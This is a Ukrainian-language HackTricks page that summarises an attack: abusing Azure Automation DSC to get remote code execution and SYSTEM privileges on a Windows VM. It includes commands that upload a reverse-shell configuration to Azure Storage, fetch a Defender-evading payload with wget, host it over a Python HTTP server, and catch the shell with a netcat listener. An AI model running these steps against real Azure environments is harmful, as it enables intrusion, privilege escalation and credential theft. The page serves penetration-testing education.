Az - State Configuration RCE

Вивчайте та практикуйте взлом AWS: Школа взлому HackTricks AWS Red Team Expert (ARTE) Вивчайте та практикуйте взлом GCP: Школа взлому HackTricks GCP Red Team Expert (GRTE)

Підтримайте HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
Поширюйте хакерські трюки, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв GitHub.

Перевірте повний пост за посиланням: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

Огляд підготовки і кроки інфраструктури віддаленого сервера (C2)

Огляд

Процес включає налаштування інфраструктури віддаленого сервера для розміщення модифікованого пакету Nishang Invoke-PowerShellTcp.ps1, під назвою RevPS.ps1, призначеного для обхіду Windows Defender. Пакет обслуговується з машини Kali Linux з IP-адресою 40.84.7.74, використовуючи простий Python HTTP сервер. Операція виконується через кілька кроків:

Крок 1 — Створення файлів

Потрібні файли: Потрібні два сценарії PowerShell:

reverse_shell_config.ps1: Файл конфігурації бажаного стану (DSC), який отримує та виконує пакет. Його можна отримати з GitHub.
push_reverse_shell_config.ps1: Сценарій для публікації конфігурації на віртуальну машину, доступний на GitHub.

Налаштування: Змінні та параметри в цих файлах повинні бути адаптовані до конкретного середовища користувача, включаючи назви ресурсів, шляхи до файлів та ідентифікатори сервера/пакету.

Крок 2 — Архівування файлу конфігурації

Файл reverse_shell_config.ps1 стискається в архівний файл .zip, щоб бути готовим для передачі до облікового запису Azure Storage.

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

Крок 3 — Встановлення контексту сховища та завантаження

Зазипований файл конфігурації завантажується до попередньо визначеного контейнера Azure Storage, azure-pentest, за допомогою командлету Set-AzStorageBlobContent Azure.

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

Крок 4 — Підготовка Kali Box

Сервер Kali завантажує вантаж RevPS.ps1 з репозиторію GitHub.

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1

Сценарій редагується для вказівки цільової віртуальної машини Windows та порту для зворотньої оболонки.

Крок 5 — Опублікувати файл конфігурації

Виконується файл конфігурації, що призводить до розгортання сценарію зворотньої оболонки за вказаною локацією на віртуальній машині Windows.

Крок 6 — Розміщення вантажу та налаштування прослуховувача

Запускається Python SimpleHTTPServer для розміщення вантажу, разом з прослуховувачем Netcat для захоплення вхідних підключень.

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443

Заплановане завдання виконує вантаж, досягаючи привілеїв рівня SYSTEM.

Висновок

Успішне виконання цього процесу відкриває безліч можливостей для подальших дій, таких як витягування облікових даних або розширення атаки на кілька віртуальних машин. Посібник закликає до продовження навчання та креативності в галузі Azure Automation DSC.

Підтримайте HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
Поширюйте хакерські трюки, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.

PreviousAz - Automation Account NextAz - Azure App Service & Function Apps

Last updated 1 month ago